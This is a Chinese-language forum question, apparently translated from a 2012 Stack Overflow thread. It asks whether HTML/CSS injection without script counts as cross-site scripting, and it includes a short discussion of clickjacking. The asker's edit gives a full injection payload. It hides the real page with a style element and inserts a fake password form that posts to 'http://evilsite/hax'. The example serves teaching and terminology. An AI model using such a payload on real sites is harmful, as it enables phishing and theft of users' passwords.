我正在進行關於網絡安全的演示,並準備展示幾個基本的跨站點腳本示例。XSS/Cross Site Scripting是否也包含CSS注入?
有趣的是,雖然在Chrome的這些例子中工作時,我遇到了Chrome的XSS預防功能,在這裏如果腳本正在執行也存在於該請求,它將檢測;非常漂亮的功能。
因爲我的例子故意寫回以轉義格式提交的內容,我決定去看看Chrome是否以同樣的方式處理樣式信息。在這種情況下,我能夠提交結束標籤和一個隱藏文檔其餘部分的樣式元素,並用我的內容改寫它。
我想知道的是:我所做的仍然算作跨站點腳本,還是稱爲其他東西?它仍然是一種將內容注入頁面以改變佈局的攻擊,可能會做一些惡意的事情,比如添加一個提交給攻擊者網站的表單,但它並不明確地注入腳本。
我想確保我得到這個東西的語義是正確的,這種情況似乎打敗明確調用XSS基於腳本的攻擊的概念,除非它有自己的名字。
在此先感謝!
編輯:我要提供什麼我談論
如果我有以下頁面的一個簡單的例子:
<html>
<body>
<h1 class="welcome">Welcome Fred!</h1>
</body>
</html>
術語「弗雷德」由用戶來輸入,如果沒有逃脫存在我可以注入:
<html>
<body>
<h1 class="welcome">Welcome
<!-- begin injected code -->
</h1>
<style>.welcome { visibility: hidden; display: none; }</style>
<h1>Please enter your password to continue</h1>
<form method="post" action="http://evilsite/hax">
<label for="password">Password:</label>
<input type="password" id="password" name="password" />
<input type="Submit" name="Submit" value="Submit">
</form>
<h1 class="welcome">
<!-- end injected code -->
!
</h1>
</body>
</html>
然後頁面看起來像合法的網站要求用戶的密碼,同時將提交到攻擊者的網站(並且可能重定向到合法網站以使受害者不知道)。
它仍然具有與普通的基於腳本的XSS攻擊類似的意圖,但不涉及任何腳本。
你可以用CSS來做一些非常酷的事情(用一種非常邪惡的方式),稱爲「點擊頂起」。 – 2012-03-11 07:28:35
我知道click-jacking;但我認爲這是一種不同的攻擊形式。 – theotherian 2012-03-11 07:57:42